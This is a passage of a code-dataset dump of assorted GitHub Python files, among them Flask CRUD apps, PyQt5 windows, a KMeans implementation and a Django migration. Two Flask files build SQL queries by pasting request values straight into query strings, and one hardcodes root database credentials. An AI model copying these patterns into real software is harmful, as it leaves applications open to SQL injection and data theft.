expected_output\n","repo_name":"UsmanovTimur/pytest_lessons","sub_path":"example3/test_find_char.py","file_name":"test_find_char.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44668898500","text":"from flask import Flask,render_template, request, redirect\r\nimport mysql.connector\r\napp=Flask(__name__)\r\n\r\nbd=mysql.connector.connect( host=\"localhost\",\r\n user=\"root\",\r\n password=\"root\",\r\n database=\"flask\"\r\n )\r\nmycursor=bd.cursor()\r\n\r\n@app.route(\"/\")\r\ndef homePage():\r\n mycursor.execute(\"select * from personal\")\r\n records=mycursor.fetchall();\r\n \r\n return render_template(\"HomePage.html\",data=records) \r\n\r\n@app.route(\"/departments/\") \r\ndef departmentlist(dept):\r\n \r\n mycursor.execute(\"select * from personal where department='\"+dept+\"'\")\r\n records=mycursor.fetchall();\r\n \r\n return render_template(\"HomePage.html\",data=records) \r\n\r\n@app.route(\"/details/\") \r\ndef details(empno):\r\n \r\n mycursor.execute(\"select * from personal where empno='\"+empno+\"'\")\r\n personalrecord=mycursor.fetchall();\r\n mycursor.execute(\"select * from accounts where empno='\"+empno+\"'\")\r\n salaryrecords=mycursor.fetchall();\r\n return render_template(\"details.html\",personal=personalrecord,accounts=salaryrecords) \r\n \r\n@app.route(\"/newrecord\") \r\ndef newrecord():\r\n\r\n return render_template(\"inputform.html\") \r\n \r\n@app.route(\"/newrecordsalary\") \r\ndef newrecord2():\r\n\r\n return render_template(\"payslipinputform.html\") \r\n\r\n@app.route(\"/saverecord\",methods=[\"POST\"]) \r\ndef saverecord():\r\n \r\n name=request.form[\"na\"]\r\n dept=request.form[\"dept\"]\r\n sql1=\"insert into personal (name,department) values('{0}','{1}')\".format(name,dept)\r\n mycursor.execute(sql1)\r\n bd.commit()\r\n \r\n return redirect(\"/\") \r\n\r\n\r\n@app.route(\"/saverecord2\",methods=[\"POST\"]) \r\ndef saverecord2():\r\n empno=request.form[\"empno\"]\r\n amount=request.form[\"salary\"]\r\n sql1=\"insert into accounts (empno,salaryDate,amount) values({0},now(),{1})\".format(empno,amount)\r\n mycursor.execute(sql1)\r\n bd.commit()\r\n \r\n return redirect(\"/\") \r\n \r\n@app.route(\"/employeelist\",methods=[\"POST\"]) \r\ndef employeelist():\r\n dept=request.form[\"dept\"]\r\n if dept==\"all\":\r\n mycursor.execute(\"select * from personal\")\r\n else:\r\n mycursor.execute(\"select * from personal where department='\"+dept+\"'\")\r\n records=mycursor.fetchall();\r\n return render_template(\"HomePage.html\",data=records)\r\n \r\napp.run(debug=True)\r\n","repo_name":"Triptycal/flask","sub_path":"Flask/Project6/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36052454627","text":"from PyQt5.QtWidgets import QWidget, QVBoxLayout, QTableWidget, QTableWidgetItem, QComboBox, QGroupBox, QCheckBox, QHBoxLayout, QPushButton, QButtonGroup\nfrom PyQt5.QtCore import pyqtSignal, pyqtSlot, Qt\nfrom functools import partial\nfrom .saturation_window import input_T_or_P\n\nclass SelectUnitsWindow(QWidget):\n all_units = pyqtSignal(list) # 创建一个信号\n\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"选择单位\")\n self.setGeometry(685, 368, 550, 345)\n\n layout = QVBoxLayout()\n self.setLayout(layout)\n\n self.selected_units = [\"K\", \"MPa\", \"m3\", \"kg; kmol\", \"kJ\", \"m/s\", \"μPa-s\", \"mW/m-K\", \"mN/m\"] # 保存当前各个单位名称对应的单位\n\n self.create_table()\n\n def create_table(self):\n table_widget = QTableWidget()\n table_widget.setColumnCount(2)\n table_widget.setHorizontalHeaderLabels([\"单位名称\", \"单位\"])\n table_widget.setShowGrid(False) # 隐藏表格线\n table_widget.verticalHeader().setVisible(False) # 隐藏垂直表头\n\n units_data = [\n [\"温度\", [\"K\", \"°C\", \"°F\", \"°R\", \"T/Tc\"]],\n [\"压力\", [\"Pa\", \"kPa\", \"MPa\", \"bar\", \"atm\", \"mmHg\", \"inHg\", \"psia\", \"p/pc\"]],\n [\"体积\", [\"m3\", \"cm3\", \"dm3\", \"L\", \"in3\", \"ft3\", \"gal\", \"V/Vc\"]],\n [\"质量/摩尔\", [\"g; mol\", \"kg; kmol\", \"lbm; lbmol\"]],\n [\"能量\", [\"J\", \"kJ\", \"cal\", \"kcal\", \"Btu\", \"/RTc\"]],\n [\"声速\", [\"m/s\", \"cm/s\", \"in/s\", \"ft/s\", \"mph\"]],\n [\"粘度\", [\"Pa-s\", \"mPa-s\", \"μPa-s\", \"g/cm-s\", \"Poise\", \"cPoise\", \"lbm/ft-s\", \"lbm/ft-h\"]],\n [\"热导率\", [\"W/m-K\", \"mW/m-K\", \"g-cm/s3-K\", \"cal/s-cm-K\", \"lbm-ft/s3-°F\", \"lbf/s-°F\", \"Btu/h-ft-°F\", \"Btu-in/h-ft2-°F\"]],\n [\"表面张力\", [\"N/m\", \"mN/m\", \"dyn/cm\", \"lbf/ft\"]],\n ]\n\n table_widget.setColumnCount(2)\n table_widget.setRowCount(len(units_data))\n for row, data in enumerate(units_data):\n name_item = QTableWidgetItem(data[0])\n table_widget.setItem(row, 0, name_item)\n\n unit_combo = QComboBox()\n unit_combo.addItems(data[1])\n unit_combo.setCurrentIndex(data[1].index(self.selected_units[row])) # 设置默认选项的索引值\n table_widget.setCellWidget(row, 1, unit_combo)\n unit_combo.currentIndexChanged.connect(partial(self.handle_unit_selected, row, unit_combo))\n\n self.layout().addWidget(table_widget)\n\n # 设置模态窗口\n self.setWindowModality(Qt.ApplicationModal)\n\n def handle_unit_selected(self, row, combo):\n unit = combo.currentText()\n # 更新 selected_units 列表\n self.selected_units[row] = unit\n\n # # 发出信号,将 selected_units 作为参数传递\n self.all_units.emit(self.selected_units)\n\nclass SaturationTablesWindow(QWidget):\n def __init__(self,units):\n self.units = units\n super().__init__()\n self.setWindowTitle(\"特定饱和状态\")\n self.setGeometry(400, 200, 500, 400)\n\n layout = QVBoxLayout()\n self.setLayout(layout)\n\n hbox = QHBoxLayout()\n layout.addLayout(hbox)\n\n group_box1 = QGroupBox(\"类型\")\n group_box2 = QGroupBox(\"变化量\")\n\n hbox.addWidget(group_box1)\n hbox.addWidget(group_box2)\n\n # 设置方框1的固定大小\n group_box1.setFixedSize(200, 150)\n\n # 设置方框2的固定大小\n group_box2.setFixedSize(200, 150)\n\n # 添加勾选框到方框1\n self.checkbox1_1 = QCheckBox(\"饱和气液\")\n self.checkbox1_2 = QCheckBox(\"饱和固液(熔化线)\")\n self.checkbox1_3 = QCheckBox(\"饱和固气(升华线)\")\n\n group_box1_layout = QVBoxLayout()\n group_box1.setLayout(group_box1_layout)\n group_box1_layout.addWidget(self.checkbox1_1)\n group_box1_layout.addWidget(self.checkbox1_2)\n group_box1_layout.addWidget(self.checkbox1_3)\n self.checkbox1_1.setChecked(True) # 默认勾选第一个选项\n\n # 添加勾选框到方框2\n self.checkbox2_1 = QCheckBox(\"温度\")\n self.checkbox2_2 = QCheckBox(\"压力\")\n self.checkbox2_3 = QCheckBox(\"固定温度时的质量\")\n self.checkbox2_4 = QCheckBox(\"固定压力时的质量\")\n\n group_box2_layout = QVBoxLayout()\n group_box2.setLayout(group_box2_layout)\n group_box2_layout.addWidget(self.checkbox2_1)\n group_box2_layout.addWidget(self.checkbox2_2)\n group_box2_layout.addWidget(self.checkbox2_3)\n group_box2_layout.addWidget(self.checkbox2_4)\n self.checkbox2_1.setChecked(True) # 默认勾选第一个选项\n\n # 添加按钮\n button_layout = QHBoxLayout()\n layout.addLayout(button_layout)\n\n ok_button = QPushButton(\"确定\")\n cancel_button = QPushButton(\"取消\")\n\n button_layout.addStretch()\n button_layout.addWidget(ok_button)\n button_layout.addWidget(cancel_button)\n\n # 创建按钮组并设置互斥性\n button_group1 = QButtonGroup(self)\n button_group1.addButton(self.checkbox1_1)\n button_group1.addButton(self.checkbox1_2)\n button_group1.addButton(self.checkbox1_3)\n button_group1.setExclusive(True) # 设置为互斥状态\n\n button_group2 = QButtonGroup(self)\n button_group2.addButton(self.checkbox2_1)\n button_group2.addButton(self.checkbox2_2)\n button_group2.addButton(self.checkbox2_3)\n button_group2.addButton(self.checkbox2_4)\n button_group2.setExclusive(True) # 设置为互斥状态\n\n # 连接checkbox1_2的状态改变信号到槽函数\n self.checkbox1_2.stateChanged.connect(self.handle_checkbox1_2_state_changed)\n self.checkbox1_3.stateChanged.connect(self.handle_checkbox1_2_state_changed)\n\n cancel_button.clicked.connect(self.close) # 将取消按钮的clicked信号连接到close方法\n ok_button.clicked.connect(self.open_input_saturation_window)# 连接确定按钮的点击事件到打开另一个子窗口的槽函数\n \n self.setLayout(layout)\n\n # 设置模态窗口\n self.setWindowModality(Qt.ApplicationModal)\n\n @pyqtSlot(int)\n def handle_checkbox1_2_state_changed(self, state):\n # 根据checkbox1_2的状态设置checkbox2_3的可用性\n self.checkbox2_3.setDisabled(state == Qt.Checked)\n self.checkbox2_4.setDisabled(state == Qt.Checked)\n self.checkbox2_1.setChecked(True) #重新勾选第一个选项\n\n def open_input_saturation_window(self):\n self.selected_type, self.selected_vary = None, None\n \n # 获取类型复选框的选中状态\n type_checkboxes = [self.checkbox1_1, self.checkbox1_2, self.checkbox1_3]\n for i, checkbox in enumerate(type_checkboxes):\n if checkbox.isChecked():\n self.selected_type = i\n\n # 获取变化量复选框的选中状态\n vary_checkboxes = [self.checkbox2_1, self.checkbox2_2, self.checkbox2_3, self.checkbox2_4]\n for i, checkbox in enumerate(vary_checkboxes):\n if checkbox.isChecked():\n self.selected_vary = i\n\n if self.selected_vary == 0 or self.selected_vary == 1:\n self.input_saturation_window = input_T_or_P(self.selected_type, self.selected_vary,self.units)\n self.input_saturation_window.show()\n self.close() # 关闭当前子窗口\n ","repo_name":"ccmuyuu/CoolProp-hnu","sub_path":"windows/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16168101129","text":"import json\n\nallmembers = []\n\nwith open('memberdetails.json') as json_file:\n data = json.load(json_file)\n for key in data:\n myvalue = data[key]\n member = {}\n name = myvalue[\"Name\"]\n dp = myvalue[\"Profile Pic Image URL\"]\n headline = myvalue[\"Headline\"]\n tags = myvalue[\"Work Tags\"]\n email = myvalue[\"Email\"]\n linkedin = myvalue[\"LinkedIn URL\"]\n instagram = myvalue[\"Instagram URL\"]\n portfolio = myvalue[\"Portfolio URL\"]\n description = myvalue[\"Description\"]\n\n email = \"#\" if email == \"\" else email\n linkedin = \"#\" if linkedin == \"\" else linkedin\n instagram = \"#\" if instagram == \"\" else instagram\n portfolio = \"#\" if portfolio == \"\" else portfolio\n\n member[\"name\"] = name\n member[\"dp\"] = dp\n member[\"headline\"] = headline\n member[\"tags\"] = tags\n member[\"email\"] = email\n member[\"linkedin\"] = linkedin\n member[\"instagram\"] = instagram\n member[\"portfolio\"] = portfolio\n member[\"description\"] = description\n allmembers.append(member)\n\nprint(json.dumps(allmembers, indent = 1))\n\nf = open(\"members.js\", \"w\")\nf.write(\"var allmembers = \")\nf.write(json.dumps(allmembers, indent = 1))\n\nf.close()","repo_name":"yashp241195/SillyHumans","sub_path":"scripts/mapjson.py","file_name":"mapjson.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29899628392","text":"from selenium import webdriver\n\nclass FindByLinkText():\n\n def testMethod(self):\n driver = webdriver.Firefox()\n baseUrl = \"https://learn.letskodeit.com/p/practice\"\n\n driver.get(baseUrl)\n elementByLinkText = driver.find_element_by_link_text(\"Login\")\n\n if elementByLinkText is not None:\n print (\"We found an element by link text!\")\n\n elementByPartialLinkText = driver.find_element_by_partial_link_text(\"Pract\")\n\n if elementByPartialLinkText is not None:\n print (\"We found an element by partial link text!\")\n\n driver.quit()\n\n\nff = FindByLinkText()\nff.testMethod()","repo_name":"bartekh21/mighty-python","sub_path":"FindByLinkText.py","file_name":"FindByLinkText.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12365006028","text":"import torch\r\nfrom datasets import load_dataset\r\nfrom PIL import Image\r\nfrom transformers import AutoProcessor\r\n\r\nimport gradio as gr\r\n\r\n\r\n# load image\r\n#root = \"refined_data/validation/\"\r\n\r\n\r\n#dataset = load_dataset(\"imagefolder\", data_dir=root)#, split=\"validation\")\r\n\r\ndef predict(image):\r\n print(image)\r\n model = torch.load('git_finetune_2.pth',map_location = torch.device('cpu'))\r\n # image_read = Image.open(image)\r\n processor = AutoProcessor.from_pretrained(\"microsoft/git-base\")\r\n # print(processor)\r\n #example = dataset[0]\r\n #image = example[\"image\"]\r\n\r\n width, height = image.size\r\n image = image.resize((int(0.3*width), int(0.3*height)))\r\n\r\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n\r\n # prepare image for the model\r\n inputs = processor(images=image, return_tensors=\"pt\").to(device)\r\n pixel_values = inputs.pixel_values\r\n\r\n generated_ids = model.generate(pixel_values=pixel_values, max_length=50)\r\n generated_caption = processor.batch_decode(generated_ids, skip_special_tokens=True)\r\n\r\n return generated_caption\r\n\r\ngr.Interface(fn = predict,\r\n inputs=gr.Image(type=\"pil\", image_mode=\"RGB\"),\r\n outputs=gr.Textbox(label=\"Predicted caption\")).launch(share=True, server_port=7860)\r\n","repo_name":"sheetaljain15/Transformers_assessment","sub_path":"gradio_inference.py","file_name":"gradio_inference.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20864144310","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom utils import load_iris\nfrom sklearn.decomposition import PCA\n\nclass KMeans():\n\n def __init__(self, n, epoch=300, init_mode=\"kmeans++\"):\n self.n = n # 聚类类别数\n self.n_center = {} # 每个类别的中心点\n self.sample_label = [] # 储存每个样本的类别\n self.epoch = epoch # 循环迭代次数\n self.clip = 1e-6 # 设置变化距离限制如果上一次变化和这一次距离变化小于该数字则直接停止训练\n self._init_mode = init_mode # 设置初始化中心点的模式\n\n def _get_init(self):\n # 初始化中心点\n if self._init_mode == \"random\":\n n_sample = self.x.shape[0] // self.n # 得到每类数据的样本量,为了方便处理直接整除\n self.n_center = {} # 保存每一个类别的中心点\n for i in range(self.n):\n choose_point = np.random.randint(0, self.x.shape[0], size=n_sample) # 样本的选择点\n choose_sample = self.x[choose_point,:] # 选取的样本\n self.n_center[i] = np.mean(choose_sample, axis=0) # 初始中心点\n print(self.n_center)\n elif self._init_mode == \"kmeans++\":\n _init_choose_point = np.random.randint(0, self.x.shape[0], size=1) # 选择最开始的一个点\n self.n_center[0] = self.x[_init_choose_point,:] # 将最开始的点当成选定的第一个中心点\n for i in range(1, self.n):\n sample_distance = np.zeros(shape=[self.x.shape[0], ]) # 样本到现有中心点的距离总距离\n for j in list(self.n_center.keys()):\n sample_distance += (np.sum((self.x - self.n_center[j]) ** 2, axis=1))\n choose_prob = sample_distance / np.sum(sample_distance)\n choose_point = np.random.choice(np.arange(0, self.x.shape[0]), p=choose_prob)\n self.n_center[i] = self.x[choose_point, :]\n\n def cla_distance(self, center):\n # 计算每个样本到中心点的距离\n sample_distance = {} # 样本对所有中心点的距离\n for i in range(len(self.x)):\n temp = [] # 暂存每个类别的距离\n for j in range(self.n):\n temp.append(np.sum((self.x[i,:] - center[j]) ** 2))\n sample_distance[i] = temp\n return sample_distance\n\n def cla_label(self, sample_distance):\n total_distance = 0\n for i, v in sample_distance.items():\n self.sample_label.append(np.argmin(v))\n total_distance += np.min(v)\n return total_distance\n\n def cla_center(self):\n for i in range(self.n):\n temp = self.x[np.array(self.sample_label) == i, :] # 暂存该类别的原数据\n self.n_center[i] = np.mean(temp, axis=0) # 重新计算中心点\n\n def fit(self, x):\n pre_distance = 10000\n self.x = x\n # 1 初始化中心点\n self._get_init()\n # 2 训练\n for i in range(self.epoch):\n # 清空类别属性\n self.sample_label = []\n # 2.1 计算每个样本到中心点的距离\n sample_distance = self.cla_distance(self.n_center)\n # 2.2 得到每个样本的聚类类别\n distance = self.cla_label(sample_distance)\n if pre_distance - distance < self.clip:\n break\n pre_distance = distance\n # 2.3 根据类别更新中心点\n self.cla_center()\n # 更新sample_label的格式为np.ndarray\n self.sample_label = np.array(self.sample_label)\n\n\n(x_train, y_train), (x_test, y_test), _, target_names = load_iris()\nprint(x_train.shape, y_train.shape, x_test.shape, y_test.shape)\n\nmodel = KMeans(n=3)\nmodel.fit(x_train)\n\n# 可视化\npca = PCA(n_components=2)\npca.fit(x_train)\nx_train = pca.transform(x_train)\n\nplt.figure()\nplt.scatter(x_train[model.sample_label==0,0],x_train[model.sample_label==0,1],label=target_names[0])\nplt.scatter(x_train[model.sample_label==1,0],x_train[model.sample_label==1,1],label=target_names[1])\nplt.scatter(x_train[model.sample_label==2,0],x_train[model.sample_label==2,1],label=target_names[2])\nplt.legend()\nplt.show()\n","repo_name":"1837669410/ml-dl","sub_path":"ml/k-means/k-means_numpy.py","file_name":"k-means_numpy.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"29428367247","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app01', '0046_auto_20171210_1549'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='news',\n name='url',\n ),\n migrations.AddField(\n model_name='news',\n name='videourls',\n field=models.CharField(verbose_name='课程列表', max_length=5000, null=True, blank=True),\n ),\n migrations.AlterField(\n model_name='admin',\n name='userpic',\n field=models.ImageField(verbose_name='头像', default='medias/images/image30.png', upload_to='medias/images/'),\n ),\n migrations.AlterField(\n model_name='documentdata',\n name='document_data',\n field=models.FileField(verbose_name='文档资料', default='medias/document/20170209130422_Broods.txt', upload_to='medias/document/'),\n ),\n migrations.AlterField(\n model_name='documentdata',\n name='newpic',\n field=models.ImageField(verbose_name='封面图片', default='medias/upload_imgss/logo.jpg', upload_to='medias/upload_imgss/'),\n ),\n migrations.AlterField(\n model_name='news',\n name='newpic',\n field=models.ImageField(verbose_name='封面图片', default='medias/upload_imgss/logo.jpg', upload_to='medias/images/'),\n ),\n migrations.AlterField(\n model_name='news',\n name='video',\n field=models.FileField(verbose_name='教程(.mp3 .mp4)', null=True, blank=True, upload_to='medias/video/'),\n ),\n ]\n","repo_name":"wangyc666666/WoBanN","sub_path":"app01/migrations/0047_auto_20171220_1536.py","file_name":"0047_auto_20171220_1536.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7922659222","text":"import random\nfrom sqlite3 import IntegrityError\nimport string\nfrom flask import Blueprint, request, jsonify, make_response, current_app \nfrom src import db\n\n\nadministrators = Blueprint('administrators', __name__)\n\n# Listing Edit Page\n\n# /textbooks - GET\n# Get a list of textbooks and their associated listings\n@administrators.route('/textbooks', methods=['GET'])\ndef get_textbooks():\n query = '''SELECT * FROM Textbooks LEFT OUTER JOIN Listings\n ON Textbooks.ISBN = Listings.ISBN;'''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n cursor.execute(query)\n\n row_headers = [x[0] for x in cursor.description]\n json_data = []\n rows = cursor.fetchall()\n for row in rows:\n json_data.append(dict(zip(row_headers, row)))\n\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n\n# /listings/{isbn} - GET\n# Gets listing with given isbn\n@administrators.route('/listings/', methods=['GET'])\ndef get_listing(isbn):\n query = f'''SELECT * FROM Listings\n WHERE ISBN = '{isbn}'; '''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n cursor.execute(query)\n\n row_headers = [x[0] for x in cursor.description]\n json_data = []\n results = cursor.fetchall()\n\n if len(results) == 0:\n error_msg = {'error': 'No listings found for this ISBN.'}\n the_response = make_response(jsonify(error_msg))\n the_response.status_code = 400\n return the_response\n\n for row in results:\n json_data.append(dict(zip(row_headers, row)))\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n\n# /listings/ - POST\n# Adds a new listing for a given textbook\n@administrators.route('/listings/', methods=['POST'])\ndef make_listing():\n data = request.json\n listing_id = \"\".join(random.choice(string.ascii_letters + string.digits) for _ in range(10))\n quantity = data['Quantity']\n price = data['Price']\n employee_id = data['EmployeeId']\n shipper_name = data['ShipperName']\n isbn = data['ISBN']\n\n # add the new listing\n query = f'''INSERT INTO Listings\n (ListingId, Quantity, Price, EmployeeId, ShipperName, ISBN)\n VALUES ('{listing_id}', '{quantity}', '{price}', '{employee_id}', '{shipper_name or 'NULL'}', '{isbn}');'''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n try:\n cursor.execute(query)\n db.get_db().commit()\n return jsonify({\"message\": \"Listing created successfully\"}, 200)\n except KeyError as e:\n # if a required field is missing from the JSON data\n return make_response(f\"Missing field: {e}\", 400)\n except IntegrityError as e:\n # if the listing or user ids are invalid\n db.get_db().rollback()\n return make_response(str(e), 400)\n except Exception as e:\n # for any other exception\n db.get_db().rollback()\n return make_response(str(e), 500)\n \n\n# /listings/{listingId} - PUT\n# Updates attributes of listing \n@administrators.route('/listings/', methods=['PUT'])\ndef edit_listing(isbn):\n req_data = request.get_json()\n quantity = req_data.get('Quantity')\n price = req_data.get('Price')\n employee_id = req_data.get('EmployeeId')\n shipper_name = req_data.get('ShipperName')\n \n query = f'''UPDATE Listings\n SET Quantity = {quantity}, Price = {price}, EmployeeId = '{employee_id}', ShipperName = '{shipper_name}'\n WHERE ISBN = '{isbn}';'''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n try:\n cursor.execute(query)\n db.get_db().commit()\n except IntegrityError as e:\n return jsonify({\"message\": f\"Listing {isbn} not found\"}, 400)\n\n # return success message\n return jsonify({\"message\": \"Listing updated successfully\"})\n\n\n\n# /listings/{listingId} - DELETE\n# Removes a given listing\n@administrators.route('/listings/', methods=['DELETE'])\ndef delete_listing(isbn):\n query = f\"DELETE FROM Listings WHERE ISBN = '{isbn}';\"\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n try: \n cursor.execute(query)\n db.get_db().commit()\n except IntegrityError as e:\n return make_response(str(e), 400)\n \n return \"Success\"\n\n\n\n# Reviews Edit Page\n\n# /reviews/{UserId} - GET\n# Gets all reviews associated with a given user\n\n@administrators.route('/UserReviews/', methods = ['GET'])\ndef get_user_review(UserId):\n query = f'''select UserId, ReviewId, ReviewDate, Rating, ReviewComment\n FROM UserReviews\n WHERE UserId = '{UserId}';'''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n cursor.execute(query)\n\n row_header = [x[0] for x in cursor.description]\n json_data = []\n theData = cursor.fetchall()\n for row in theData:\n json_data.append(dict(zip(row_header, row)))\n \n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n\n\n# /reviews/{UserId}/{ReviewId} - GET\n# Gets a selected review of the given user\n@administrators.route('/UserReviews//', methods = ['GET'])\ndef get_one_review(user_id, review_id):\n query = f'''select UserId, ReviewId, ReviewDate, Rating, ReviewComment\n FROM UserReviews\n WHERE UserId = '{user_id}' and ReviewId = '{review_id}';'''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n cursor.execute(query)\n\n row_header = [x[0] for x in cursor.description]\n json_data = []\n the_data = cursor.fetchall()\n for row in the_data:\n json_data.append(dict(zip(row_header, row)))\n\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n# /reviews/{userId}/{reviewID} - DELETE\n# Deletes a selected review\n@administrators.route('/UserReviews//', methods = ['DELETE'])\ndef delete_selected_review(UserId, ReviewId):\n query = f\"DELETE FROM UserReviews WHERE UserId = '{UserId}' and ReviewId = '{ReviewId}';\"\n current_app.logger.info(query)\n \n cursor = db.get_db().cursor()\n try: \n cursor.execute(query)\n db.get_db().commit()\n except IntegrityError as e:\n return make_response(str(e), 400)\n \n return \"Success\"\n\n\n# /reviews/{UserId} - POST\n# Adds a new review for a given user\n@administrators.route('/UserReviews/', methods = ['POST']) \ndef add_user_review(user_id):\n req_data = request.json\n review_id = \"\".join(random.choice(string.ascii_letters + string.digits) for _ in range(10))\n comment = req_data['Comment']\n rating = req_data['Rating']\n\n query = f'''INSERT INTO UserReviews (UserId, ReviewId, ReviewComment, Rating) \n VALUES ('{user_id}', '{review_id}', '{comment}', {rating})'''\n current_app.logger.info(query)\n \n cursor = db.get_db().cursor()\n try: \n cursor.execute(query)\n db.get_db().commit()\n except IntegrityError as e:\n return make_response(str(e), 400)\n return \"Success\"\n\n\n\n# /reviews/{userId}/{reviewID} -PUT\n# Updates a selected review\n@administrators.route('/UserReviews//', methods=['PUT'])\ndef update_review_info(user_id, review_id):\n req_data = request.json\n ReviewComment = req_data['ReviewComment']\n Rating = req_data['Rating']\n \n query = f'''UPDATE UserReviews\n SET ReviewComment = '{ReviewComment}', Rating = '{Rating}'\n WHERE UserId = '{user_id}' AND ReviewId = '{review_id}';'''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n try: \n cursor.execute(query)\n db.get_db().commit()\n except IntegrityError as e:\n return make_response(str(e), 400)\n\n return \"Success\"\n \n\n\n# /users - GET\n# Get a list of all users in the database\n@administrators.route('/Users', methods=['GET'])\ndef get_users():\n query = f'''SELECT CONCAT(FirstName, ' ', LastName) as label, UserId as value\n FROM Users;'''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n try: \n cursor.execute(query)\n db.get_db().commit()\n except IntegrityError as e:\n return make_response(str(e), 400)\n\n row_header = [x[0] for x in cursor.description]\n json_data = []\n theData = cursor.fetchall()\n for row in theData:\n json_data.append(dict(zip(row_header, row)))\n \n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n\n\n# /employees - GET\n# get all of the employees in the database\n@administrators.route('/employees', methods=['GET'])\ndef get_employees():\n query = f'''SELECT CONCAT(FirstName, ' ', LastName) as label, EmployeeId as value \n FROM Employees;'''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n try: \n cursor.execute(query)\n db.get_db().commit()\n except IntegrityError as e:\n return make_response(str(e), 400)\n \n row_headers = [x[0] for x in cursor.description]\n the_data = cursor.fetchall()\n json_data = []\n for row in the_data:\n json_data.append(dict(zip(row_headers, row)))\n\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n\n# /shippers - GET\n# get all of the shippers in the database\n@administrators.route('/shippers', methods=['GET'])\ndef get_shippers():\n query = f'SELECT ShipperName AS label, ShipperName AS value FROM Shippers;'\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n try: \n cursor.execute(query)\n db.get_db().commit()\n except IntegrityError as e:\n return make_response(str(e), 400)\n \n row_headers = [x[0] for x in cursor.description]\n the_data = cursor.fetchall()\n json_data = []\n for row in the_data:\n json_data.append(dict(zip(row_headers, row)))\n\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n","repo_name":"pjanosky/cs3200-bibliomart-files","sub_path":"flask-app/src/administrators/administrators.py","file_name":"administrators.py","file_ext":"py","file_size_in_byte":10315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71101186409","text":"from flask import Flask, abort, request, make_response, render_template, url_for, redirect\nfrom lti_module.check_request import check_request\nfrom lti_module import utils\nfrom db import get_secret\n\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET'])\ndef index():\n return make_response(render_template('index.html', **request.args))\n\n\n@app.route('/lti', methods=['POST'])\ndef lti_route():\n params = request.form\n consumer_secret = get_secret(params.get('oauth_consumer_key', ''))\n request_info = dict( \n headers=dict(request.headers),\n data=params,\n url=request.url,\n secret=consumer_secret\n )\n \n if check_request(request_info):\n # request is ok, let's start working!\n lti_params = {\n 'username': utils.get_username(params),\n 'person_name': utils.get_person_name(params),\n 'course_title': utils.get_title(params),\n 'return_url': utils.get_return_url(params),\n 'custom_params': utils.get_custom_params(params),\n 'role': utils.get_role(params)\n }\n return redirect(url_for('index', **lti_params))\n else:\n abort(403)\n\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run()\n","repo_name":"HadronCollider/LTI_examples","sub_path":"extract_params_example/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"5162089798","text":"import random\n\nfrom data.GLC23TimeSeriesProviders import MultipleCSVTimeSeriesProvider, CSVTimeSeriesProvider\nfrom data.GLC23Datasets import TimeSeriesDataset\n\ndata_path = '/home/tlarcher/Documents/Pl@ntNet/git/GLC/data/sample_data/' # root path of the data\n# configure providers\nts_red = CSVTimeSeriesProvider(data_path+'SatelliteTimeSeries/time_series_red.csv')\nts_multi = MultipleCSVTimeSeriesProvider(data_path+'SatelliteTimeSeries/', select=['red', 'blue'])\nts_all = MultipleCSVTimeSeriesProvider(data_path+'SatelliteTimeSeries/')\n\n# create dataset\ndataset = 